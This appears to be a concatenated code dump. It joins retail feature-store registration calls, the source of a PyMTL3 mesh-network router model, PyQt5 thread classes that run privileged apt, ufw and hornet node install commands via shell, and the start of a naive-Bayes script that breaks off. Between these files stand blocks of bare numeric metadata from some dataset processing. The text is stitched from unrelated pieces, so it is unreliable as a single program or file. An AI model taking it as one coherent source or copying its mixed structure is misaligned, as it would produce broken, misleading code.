fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_NOVELTY_REVN_RATE_16W', desc='Last 16 weeks avg revenue per week in the Novelty category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Novelty","TimeGranularity","Week","WindowLength","16"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_NOVELTY_REVN_RATE_32W', desc='Last 32 weeks avg revenue per week in the Novelty category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Novelty","TimeGranularity","Week","WindowLength","32"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_NOVELTY_REVN_RATE_52W', desc='Last 52 weeks avg revenue per week in the Novelty category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Novelty","TimeGranularity","Week","WindowLength","52"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_SCHOOL_SUPPLIES_REVN_RATE_1W', desc='Last 1 week avg revenue per week in the School Supplies category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","School Supplies","TimeGranularity","Week","WindowLength","1"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_SCHOOL_SUPPLIES_REVN_RATE_2W', desc='Last 2 weeks avg revenue per week in the School Supplies category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","School Supplies","TimeGranularity","Week","WindowLength","2"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_SCHOOL_SUPPLIES_REVN_RATE_4W', desc='Last 4 weeks avg revenue per week in the School Supplies category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","School Supplies","TimeGranularity","Week","WindowLength","4"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_SCHOOL_SUPPLIES_REVN_RATE_8W', desc='Last 8 weeks avg revenue per week in the School Supplies category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","School Supplies","TimeGranularity","Week","WindowLength","8"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_SCHOOL_SUPPLIES_REVN_RATE_16W', desc='Last 16 weeks avg revenue per week in the School Supplies category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","School Supplies","TimeGranularity","Week","WindowLength","16"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_SCHOOL_SUPPLIES_REVN_RATE_32W', desc='Last 32 weeks avg revenue per week in the School Supplies category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","School Supplies","TimeGranularity","Week","WindowLength","32"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_SCHOOL_SUPPLIES_REVN_RATE_52W', desc='Last 52 weeks avg revenue per week in the School Supplies category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","School Supplies","TimeGranularity","Week","WindowLength","52"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_TOYS_REVN_RATE_1W', desc='Last 1 week avg revenue per week in the Toys category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Toys","TimeGranularity","Week","WindowLength","1"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_TOYS_REVN_RATE_2W', desc='Last 2 weeks avg revenue per week in the Toys category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Toys","TimeGranularity","Week","WindowLength","2"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_TOYS_REVN_RATE_4W', desc='Last 4 weeks avg revenue per week in the Toys category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Toys","TimeGranularity","Week","WindowLength","4"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_TOYS_REVN_RATE_8W', desc='Last 8 weeks avg revenue per week in the Toys category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Toys","TimeGranularity","Week","WindowLength","8"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_TOYS_REVN_RATE_16W', desc='Last 16 weeks avg revenue per week in the Toys category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Toys","TimeGranularity","Week","WindowLength","16"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_TOYS_REVN_RATE_32W', desc='Last 32 weeks avg revenue per week in the Toys category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Toys","TimeGranularity","Week","WindowLength","32"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_TOYS_REVN_RATE_52W', desc='Last 52 weeks avg revenue per week in the Toys category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Toys","TimeGranularity","Week","WindowLength","52"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_TRAVEL_REVN_RATE_1W', desc='Last 1 week avg revenue per week in the Travel category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Travel","TimeGranularity","Week","WindowLength","1"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_TRAVEL_REVN_RATE_2W', desc='Last 2 weeks avg revenue per week in the Travel category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Travel","TimeGranularity","Week","WindowLength","2"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_TRAVEL_REVN_RATE_4W', desc='Last 4 weeks avg revenue per week in the Travel category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Travel","TimeGranularity","Week","WindowLength","4"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_TRAVEL_REVN_RATE_8W', desc='Last 8 weeks avg revenue per week in the Travel category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Travel","TimeGranularity","Week","WindowLength","8"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_TRAVEL_REVN_RATE_16W', desc='Last 16 weeks avg revenue per week in the Travel category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Travel","TimeGranularity","Week","WindowLength","16"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_TRAVEL_REVN_RATE_32W', desc='Last 32 weeks avg revenue per week in the Travel category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Travel","TimeGranularity","Week","WindowLength","32"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_TRAVEL_REVN_RATE_52W', desc='Last 52 weeks avg revenue per week in the Travel category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Travel","TimeGranularity","Week","WindowLength","52"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_TOTAL_REVN_RATE_1W', desc='Last 1 week avg revenue per week in the Total category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Total","TimeGranularity","Week","WindowLength","1"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_TOTAL_REVN_RATE_2W', desc='Last 2 weeks avg revenue per week in the Total category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Total","TimeGranularity","Week","WindowLength","2"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_TOTAL_REVN_RATE_4W', desc='Last 4 weeks avg revenue per week in the Total category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Total","TimeGranularity","Week","WindowLength","4"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_TOTAL_REVN_RATE_8W', desc='Last 8 weeks avg revenue per week in the Total category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Total","TimeGranularity","Week","WindowLength","8"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_TOTAL_REVN_RATE_16W', desc='Last 16 weeks avg revenue per week in the Total category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Total","TimeGranularity","Week","WindowLength","16"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_TOTAL_REVN_RATE_32W', desc='Last 32 weeks avg revenue per week in the Total category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Total","TimeGranularity","Week","WindowLength","32"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_TOTAL_REVN_RATE_52W', desc='Last 52 weeks avg revenue per week in the Total category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Total","TimeGranularity","Week","WindowLength","52"])
fs.deploy_feature_set('retail_fs','customer_rfm_by_category')
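# --------------------------------------------------------------------------
# Hedged sketch: the repetitive create_feature calls above differ only in the
# category and window length, so they could equivalently be generated by a
# helper like the one below. Only the fs.create_feature signature already
# used above is assumed; the helper name and its argument list are
# hypothetical and shown for illustration only.
def register_revn_rate_features(fs, categories, windows=(1, 2, 4, 8, 16, 32, 52)):
    for cat in categories:
        col = cat.upper().replace(' ', '_')
        for w in windows:
            fs.create_feature(
                schema_name='retail_fs',
                table_name='customer_rfm_by_category',
                name=f'CUSTOMER_RFM_{col}_REVN_RATE_{w}W',
                desc=f'Last {w} week{"s" if w > 1 else ""} avg revenue per week in the {cat} category.',
                feature_data_type='DOUBLE',
                feature_type=FeatureType.continuous,
                tags=["Entity", "Customer", "Calculation", "RFM",
                      "MetricType", "Rate", "UnitOfMeasure", "Dollars",
                      "ProductCategory", cat, "TimeGranularity", "Week",
                      "WindowLength", str(w)])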
| 375.415459
| 450
| 0.757525
| 9,610
| 77,711
| 5.855983
| 0.016857
| 0.075485
| 0.089825
| 0.056934
| 0.981911
| 0.981733
| 0.981449
| 0.977646
| 0.974305
| 0.973292
| 0
| 0.009825
| 0.08318
| 77,711
| 206
| 451
| 377.237864
| 0.780047
| 0.0022
| 0
| 0.03125
| 0
| 0.005208
| 0.551758
| 0.123804
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.005208
| 0
| 0.005208
| 0.010417
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
bd5968245a3eaafdff5fd34a76206233d7bcf13b
| 5,214
|
py
|
Python
|
pymtl3_net/meshnet/MeshRouterFL.py
|
cornell-brg/ocn-posh
|
7f8bfd800627364cfc37dc5d6a36333ee2e48c99
|
[
"BSD-3-Clause"
] | 3
|
2019-06-07T13:27:06.000Z
|
2019-07-16T19:00:23.000Z
|
pymtl3_net/meshnet/MeshRouterFL.py
|
cornell-brg/ocn-posh
|
7f8bfd800627364cfc37dc5d6a36333ee2e48c99
|
[
"BSD-3-Clause"
] | 12
|
2019-07-23T02:29:31.000Z
|
2019-07-25T11:07:00.000Z
|
pymtl3_net/meshnet/MeshRouterFL.py
|
cornell-brg/posh-ocn
|
7f8bfd800627364cfc37dc5d6a36333ee2e48c99
|
[
"BSD-3-Clause"
] | null | null | null |
"""
==========================================================================
MeshRouterFL.py
==========================================================================
Functional level implementation of mesh router.
Author : Yanghui Ou
Date : July 3, 2019
"""
from pymtl3 import *
from .directions import *
#-------------------------------------------------------------------------
# MeshRouterFL
#-------------------------------------------------------------------------
# Mesh router that supports single flit packet.
class MeshRouterFL:
def __init__( s, pos_x, pos_y, dimension='y' ):
s.pos_x = pos_x
s.pos_y = pos_y
s.dimension = dimension
def arrange_src_pkts( s, lst ):
src_pkts = [ [] for _ in range(5) ]
if s.dimension == 'y':
for pkt in lst:
if pkt.src_x == s.pos_x and pkt.src_y == s.pos_y:
src_pkts[SELF].append( pkt )
elif pkt.src_x == s.pos_x:
if pkt.src_y < s.pos_y:
src_pkts[SOUTH].append( pkt )
else:
src_pkts[NORTH].append( pkt )
elif pkt.src_x < s.pos_x:
src_pkts[WEST].append( pkt )
else:
src_pkts[EAST].append( pkt )
else: # s.dimension == 'x'
for pkt in lst:
if pkt.src_x == s.pos_x and pkt.src_y == s.pos_y:
src_pkts[SELF].append( pkt )
elif pkt.src_y == s.pos_y:
if pkt.src_x < s.pos_x:
src_pkts[WEST].append( pkt )
else:
src_pkts[EAST].append( pkt )
elif pkt.src_y < s.pos_y:
src_pkts[SOUTH].append( pkt )
else:
src_pkts[NORTH].append( pkt )
return src_pkts
def route( s, src_pkts ):
assert len( src_pkts ) == 5
dst_pkts = [ [] for _ in range(5) ]
if s.dimension == 'y':
for pkts in src_pkts:
for pkt in pkts:
dst = (
SELF if pkt.dst_x == s.pos_x and pkt.dst_y == s.pos_y else
NORTH if pkt.dst_y > s.pos_y else
SOUTH if pkt.dst_y < s.pos_y else
EAST if pkt.dst_x > s.pos_x else
WEST
)
dst_pkts[ dst ].append( pkt )
else: # s.dimension == 'x'
for pkts in src_pkts:
for pkt in pkts:
dst = (
SELF if pkt.dst_x == s.pos_x and pkt.dst_y == s.pos_y else
EAST if pkt.dst_x > s.pos_x else
WEST if pkt.dst_x < s.pos_x else
NORTH if pkt.dst_y > s.pos_y else
SOUTH
)
dst_pkts[ dst ].append( pkt )
return dst_pkts
#-------------------------------------------------------------------------
# MeshRouterMflitFL
#-------------------------------------------------------------------------
# Mesh router that supports multi-flit packets.
class MeshRouterMflitFL:
def __init__( s, Header, pos_x, pos_y, first_dimension='x' ):
s.Header = Header
s.pos_x = pos_x
s.pos_y = pos_y
s.first_dimension = first_dimension
def arrange_src_pkts( s, lst ):
src_pkts = [ [] for _ in range(5) ]
if s.first_dimension == 'y':
for pkt in lst:
header = s.Header.from_bits( pkt.flits[0] )
if header.src_x == s.pos_x and header.src_y == s.pos_y:
src_pkts[ SELF ].append( pkt )
elif header.src_x == s.pos_x:
if header.src_y < s.pos_y:
src_pkts[ SOUTH ].append( pkt )
else:
src_pkts[ NORTH ].append( pkt )
elif header.src_x < s.pos_x:
src_pkts[ WEST ].append( pkt )
else:
src_pkts[ EAST ].append( pkt )
elif s.first_dimension == 'x':
for pkt in lst:
header = s.Header.from_bits( pkt.flits[0] )
if header.src_x == s.pos_x and header.src_y == s.pos_y:
src_pkts[ SELF ].append( pkt )
elif header.src_y == s.pos_y:
if header.src_x < s.pos_x:
src_pkts[ WEST ].append( pkt )
else:
src_pkts[ EAST ].append( pkt )
elif header.src_y < s.pos_y:
src_pkts[ SOUTH ].append( pkt )
else:
src_pkts[ NORTH ].append( pkt )
else:
assert False
return src_pkts
def route( s, src_pkts ):
assert len( src_pkts ) == 5
dst_pkts = [ [] for _ in range(5) ]
if s.first_dimension == 'y':
for pkts in src_pkts:
for pkt in pkts:
header = s.Header.from_bits( pkt.flits[0] )
dst = (
SELF if header.dst_x == s.pos_x and header.dst_y == s.pos_y else
NORTH if header.dst_y > s.pos_y else
SOUTH if header.dst_y < s.pos_y else
EAST if header.dst_x > s.pos_x else
WEST
)
dst_pkts[ dst ].append( pkt )
elif s.first_dimension == 'x':
for pkts in src_pkts:
for pkt in pkts:
header = s.Header.from_bits( pkt.flits[0] )
dst = (
SELF if header.dst_x == s.pos_x and header.dst_y == s.pos_y else
EAST if header.dst_x > s.pos_x else
WEST if header.dst_x < s.pos_x else
NORTH if header.dst_y > s.pos_y else
SOUTH
)
dst_pkts[ dst ].append( pkt )
else:
assert False
return dst_pkts
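#-------------------------------------------------------------------------
# Usage sketch
#-------------------------------------------------------------------------
# A minimal, hedged example of driving MeshRouterFL. The Pkt namedtuple is
# hypothetical -- any object carrying src_x/src_y/dst_x/dst_y fields works;
# the real packet types come from the pymtl3_net testbenches.
if __name__ == '__main__':
  from collections import namedtuple
  Pkt = namedtuple( 'Pkt', 'src_x src_y dst_x dst_y' )
  router = MeshRouterFL( pos_x=1, pos_y=1, dimension='y' )
  pkts = [ Pkt(1, 1, 2, 1), Pkt(0, 1, 1, 1), Pkt(1, 0, 1, 2) ]
  src_pkts = router.arrange_src_pkts( pkts )
  dst_pkts = router.route( src_pkts )
  # dst_pkts[i] holds the packets leaving through output port i, indexed by
  # the SELF/NORTH/SOUTH/WEST/EAST constants imported from .directions.
  print( [ len( p ) for p in dst_pkts ] )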
| 30.313953
| 77
| 0.494246
| 734
| 5,214
| 3.294278
| 0.089918
| 0.074442
| 0.04756
| 0.049628
| 0.864764
| 0.864764
| 0.848222
| 0.838296
| 0.765922
| 0.755997
| 0
| 0.004545
| 0.324895
| 5,214
| 171
| 78
| 30.491228
| 0.682386
| 0.13598
| 0
| 0.755725
| 0
| 0
| 0.001783
| 0
| 0
| 0
| 0
| 0
| 0.030534
| 1
| 0.045802
| false
| 0
| 0.015267
| 0
| 0.10687
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
bd6c1650b0d71c5b030b18d2e7e3232f343aecf9
| 9,856
|
py
|
Python
|
raspihive/threads.py
|
no8ody/raspihive
|
75c82dc4406cd0fe92400de4fd50d2616cd1f656
|
[
"MIT"
] | 6
|
2020-09-06T16:43:06.000Z
|
2021-12-28T00:58:33.000Z
|
raspihive/threads.py
|
no8ody/raspihive
|
75c82dc4406cd0fe92400de4fd50d2616cd1f656
|
[
"MIT"
] | 27
|
2020-08-10T15:18:29.000Z
|
2022-03-16T16:34:37.000Z
|
raspihive/threads.py
|
no8ody/raspihive
|
75c82dc4406cd0fe92400de4fd50d2616cd1f656
|
[
"MIT"
] | 5
|
2020-08-10T14:33:27.000Z
|
2021-07-22T20:26:39.000Z
|
###############################################################################
# libraries
import sys, time, os, subprocess, os.path, shutil
from os import path
from PyQt5.QtWidgets import (
QApplication,
QWidget,
QMessageBox,
QProgressBar,
QPushButton,
QAction,
qApp
)
from PyQt5.QtCore import QThread, pyqtSignal
#from .helpers import os_parse
##############################################################################
#Thread for OS Update
class MyThread_os_update(QThread):
# Create a counter thread
change_value = pyqtSignal(int)
def run(self):
process = subprocess.Popen(("pkexec apt-get update -y && \
sudo apt-get full-upgrade -y && sudo apt-get autoremove -y \
&& sudo apt-get clean -y && sudo apt autoclean -y"), \
stdout=subprocess.PIPE, shell = True)
p = process.stdout.readline()
# Do something else
return_code = process.poll()
if return_code is not None:
print('RETURN CODE', return_code)
else:
print("STARTING")
cnt = 1
while cnt <= 100:
cnt += 0.1
time.sleep(0.1)
line = process.stdout.readline()
self.change_value.emit(cnt)
print(line.strip())
sys.stdout.flush()
if cnt >= 100:
print("CNT 100 reached")
sys.stdout.flush()
sys.stdout.flush()
##############################################################################
#Thread for packages update
class MyThread_packages(QThread):
# Create a counter thread
change_value = pyqtSignal(int)
def run(self):
#print("Test packages")
process = subprocess.Popen(("pkexec apt-get update -y && \
sudo apt-get install -y build-essential && \
sudo apt-get install -y git && sudo apt-get install -y snapd \
&& sudo snap install go --classic"), \
stdout=subprocess.PIPE, shell = True)
p = process.stdout.readline()
# Do something else
return_code = process.poll()
if return_code is not None:
print('RETURN CODE', return_code)
else:
print("STARTING")
cnt = 1
while cnt <= 100:
cnt += 0.2
time.sleep(0.1)
line = process.stdout.readline()
self.change_value.emit(cnt)
print(line.strip())
sys.stdout.flush()
if cnt >= 100:
print("CNT 100 reached")
sys.stdout.flush()
sys.stdout.flush()
##############################################################################
##############################################################################
#Thread for hornet update
class MyThread_hornet_update(QThread):
# Create a counter thread
change_value = pyqtSignal(int)
def run(self):
#print("Test packages")
process = subprocess.Popen(("pkexec service hornet stop \
&& sudo apt-get update && sudo apt-get -y upgrade hornet \
&& sudo systemctl restart hornet"), stdout=subprocess.PIPE, shell = True)
p = process.stdout.readline()
# Do something else
return_code = process.poll()
if return_code is not None:
print('RETURN CODE', return_code)
else:
print("STARTING")
cnt = 5
while cnt <= 100:
cnt += 1
time.sleep(0.1)
line = process.stdout.readline()
self.change_value.emit(cnt)
print(line.strip())
sys.stdout.flush()
if cnt == 100:
print ("CNT 100 erreicht")
sys.stdout.flush()
sys.stdout.flush()
##############################################################################
#Thread for hornet install
class MyThread_hornet_install(QThread):
# Create a counter thread
change_value = pyqtSignal(int)
def run(self):
#print("Test packages")
process = subprocess.Popen(('pkexec apt-get update -y && sudo apt-get autoremove -y && sudo apt-get install -y build-essential \
&& sudo apt-get install -y git && sudo apt-get install -y snapd \
&& sudo snap install go --classic \
&& sudo apt-get install -y ufw && sudo ufw allow 15600/tcp && \
sudo ufw allow 14626/udp && sudo ufw limit openssh && \
sudo ufw enable && sudo apt-get install sshguard -y && sudo wget -qO - https://ppa.hornet.zone/pubkey.txt | sudo apt-key add - \
&& echo "deb http://ppa.hornet.zone stable main" | sudo tee -a /etc/apt/sources.list.d/hornet.list \
&& sudo apt-get update \
&& sudo apt-get install hornet && sudo systemctl enable hornet.service \
&& sudo service hornet start '), stdout=subprocess.PIPE, shell = True)
#&& sudo chown pi:pi /etc/apt/sources.list.d
#sudo mkdir /etc/apt/sources.list.d
p = process.stdout.readline()
# Do something else
return_code = process.poll()
if return_code is not None:
print('RETURN CODE', return_code)
else:
print("STARTING")
cnt = 1
while cnt <= 100:
cnt += 0.4
time.sleep(0.1)
line = process.stdout.readline()
self.change_value.emit(cnt)
print(line.strip())
sys.stdout.flush()
if cnt >= 100:
print("CNT 100 reached")
sys.stdout.flush()
sys.stdout.flush()
##############################################################################
#Thread for hornet uninstall
class MyThread_hornet_uninstall(QThread):
# Create a counter thread
change_value = pyqtSignal(int)
def run(self):
#print("Test packages")
process = subprocess.Popen(("pkexec apt-get -qq purge hornet -y \
&& sudo rm -r /etc/apt/sources.list.d/hornet.list "), \
stdout=subprocess.PIPE, shell = True)
p = process.stdout.readline()
# Do something else
return_code = process.poll()
if return_code is not None:
print('RETURN CODE', return_code)
else:
print("STARTING")
cnt = 5
while cnt <= 100:
cnt += 5
time.sleep(0.1)
line = process.stdout.readline()
self.change_value.emit(cnt)
print(line.strip())
sys.stdout.flush()
if cnt == 100:
print ("CNT 100 erreicht")
sys.stdout.flush()
sys.stdout.flush()
##############################################################################
#Thread for nginx+certbot install
class MyThread_nginx_certbot_install(QThread):
# Create a counter thread
change_value = pyqtSignal(int)
def run(self):
#print("Test packages")
process = subprocess.Popen(("pkexec apt-get update -y \
&& sudo apt-get -y upgrade && sudo apt-get install -y nginx \
&& sudo apt-get install -y ufw && sudo ufw allow 'Nginx Full' && sudo apt-get install -y apache2-utils \
&& sudo apt-get install software-properties-common -y && sudo apt-get update \
&& sudo apt-get install certbot python3-certbot-nginx -y \
"), stdout=subprocess.PIPE, shell = True)
p = process.stdout.readline()
# Do something else
return_code = process.poll()
if return_code is not None:
print('RETURN CODE', return_code)
else:
print("STARTING")
cnt = 1
while cnt <= 100:
cnt += 0.1
time.sleep(0.1)
line = process.stdout.readline()
self.change_value.emit(cnt)
print(line.strip())
sys.stdout.flush()
if cnt >= 100:
print("CNT 100 reached")
sys.stdout.flush()
sys.stdout.flush()
##############################################################################
#Thread for nginx+certbot uninstall
class MyThread_nginx_certbot_uninstall(QThread):
# Create a counter thread
change_value = pyqtSignal(int)
def run(self):
if path.exists("/etc/nginx/") == True:
#print("Test packages")
process = subprocess.Popen(("pkexec apt-get update -y && \
sudo apt-get purge -y nginx nginx-common && sudo apt-get purge -y --auto-remove apache2-utils \
&& sudo apt-get -qq purge software-properties-common certbot python3-certbot-nginx -y \
&& sudo apt-get autoremove -y\
"), stdout=subprocess.PIPE, shell = True)
p = process.stdout.readline()
# Do something else
return_code = process.poll()
if return_code is not None:
print('RETURN CODE', return_code)
else:
print("STARTING")
cnt = 1
while cnt <= 100:
cnt += 0.5
time.sleep(0.1)
line = process.stdout.readline()
self.change_value.emit(cnt)
print(line.strip())
sys.stdout.flush()
if cnt >= 100:
print("CNT 100 reached")
sys.stdout.flush()
sys.stdout.flush()
else:
print("Nginx not installed")
| 39.741935
| 140
| 0.489955
| 1,028
| 9,856
| 4.64786
| 0.142023
| 0.04144
| 0.056509
| 0.049812
| 0.802846
| 0.753663
| 0.749267
| 0.732105
| 0.718292
| 0.695689
| 0
| 0.0173
| 0.343141
| 9,856
| 247
| 141
| 39.902834
| 0.720729
| 0.073965
| 0
| 0.727273
| 0
| 0.030303
| 0.038489
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.035354
| false
| 0
| 0.020202
| 0
| 0.126263
| 0.146465
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
bd77a30cb87f16804e0a7873ae7360be7220b0a1
| 14,275
|
py
|
Python
|
primeiro_exercicio_ml/main.py
|
RamonBomfim/inteligencia-artificial
|
eab417a6c1f06fd35511d96c380ef409d02fc50a
|
[
"MIT"
] | null | null | null |
primeiro_exercicio_ml/main.py
|
RamonBomfim/inteligencia-artificial
|
eab417a6c1f06fd35511d96c380ef409d02fc50a
|
[
"MIT"
] | null | null | null |
primeiro_exercicio_ml/main.py
|
RamonBomfim/inteligencia-artificial
|
eab417a6c1f06fd35511d96c380ef409d02fc50a
|
[
"MIT"
] | null | null | null |
from sklearn.naive_bayes import GaussianNB
import pickle
# Data
# Fever, Fatigue, Cough, Sneezing, Body aches, Runny nose, Sore throat, Diarrhea, Headache, Shortness of breath
atributos = [
[1, 1, 0, 0, 0, 1, 1, 0, 1, 0],
[1, 0, 0, 0, 0, 0, 0, 1, 0, 1],
[1, 0, 1, 1, 1, 0, 0, 0, 1, 1],
[1, 1, 0, 0, 0, 0, 1, 0, 0, 1],
[1, 1, 0, 0, 1, 0, 0, 0, 0, 1],
[1, 1, 1, 0, 0, 0, 1, 0, 0, 0],
